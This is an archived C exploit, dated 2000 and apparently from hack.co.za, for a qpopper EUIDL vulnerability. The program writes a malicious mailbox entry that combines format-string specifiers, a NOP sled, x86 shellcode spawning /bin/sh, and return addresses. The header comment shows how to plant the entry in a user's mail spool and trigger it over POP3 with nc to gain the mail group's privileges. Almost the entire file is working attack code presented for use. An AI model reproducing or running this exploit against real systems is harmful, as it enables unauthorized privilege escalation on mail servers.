/*
   Lame exploit for an even more lame vulnerability by portal@security.is
      Usage: (addresses are not provided, just for fun :)
   ./qpop-euidl <esp address> <eip address> > /var/spool/mail/<user>
   (printf "user username\r\npass password\r\neuidl 1\r\n";cat) |nc victim 110
      This could perhaps be made 'remotely local' if sendmail could be
   forced to send the data through. Not that it matters.
      Greetings go the the security.is team.
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int bufsize = 541;
int esp_repeat = 2;
int eip_repeat = 2;


char shellcode[] =
  "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
  "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
  "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
  "\xff\xff/bin/sh.........";


int main(int argc, char **argv)
{
  int i;
  unsigned long ret1 = 0L;
  unsigned long ret2 = 0L;

  if (argc < 3)
    {
      fprintf (stderr, "QPOP EUIDL local. Exploited by p0rTaL (portal@security.is) Jan 10th\n\n", argv[0]);
      fprintf (stderr, "this is lame, gives gid mail, though :D *whee*\n");
      fprintf (stderr, "Usage: %s <esp address> <eip address>\n", argv[0]);
      exit(0);
    }

  ret1 = strtoul(argv[1], &argv[1], 16);
  ret2 = strtoul(argv[2], &argv[2], 16);

  fprintf (stderr, "Using %%esp = 0x%x\n", ret1);
  fprintf (stderr, "Using %%eip = 0x%x\n", ret2);

  printf ("From MAILER-DAEMON Mon Jan 10 15:27:02 2000\n");
  printf ("Date: 10 Jan 2000 15:27:02 +0000\n");
  printf ("From: ");
  for (i = 0; i < 50; i++)
    printf ("%s", "%u");

  for (i = 0; i < bufsize-strlen(shellcode); i++)
    printf ("\x90");

  for (i = 0; i < strlen(shellcode); i++)
    printf ("%c", shellcode[i]);

  /* Little endian */
  for (i = 0; i < esp_repeat; i++)
    printf ("%c%c%c%c", ((unsigned long)ret1 & 0x000000ff),
            ((unsigned long)ret1 & 0x0000ff00) >> 8,
            ((unsigned long)ret1 & 0x00ff0000) >> 16,
            ((unsigned long)ret1 & 0xff000000) >> 24);

  for (i = 0; i < eip_repeat; i++)
    printf ("%c%c%c%c", ((unsigned long)ret2 & 0x000000ff),
            ((unsigned long)ret2 & 0x0000ff00) >> 8,
            ((unsigned long)ret2 & 0x00ff0000) >> 16,
            ((unsigned long)ret2 & 0xff000000) >> 24);

  printf ("\n");
  printf ("Subject: ph33r me\n");
  printf ("Message-ID: <947518022@localhost.evilattacker.org>\n");
  printf ("X-IMAP: 0947516004 0000000001\n");
  printf ("Status: RO\n\n");
  printf ("\n");

  return (0);
}
/*                    www.hack.co.za           [8 June 2000]*/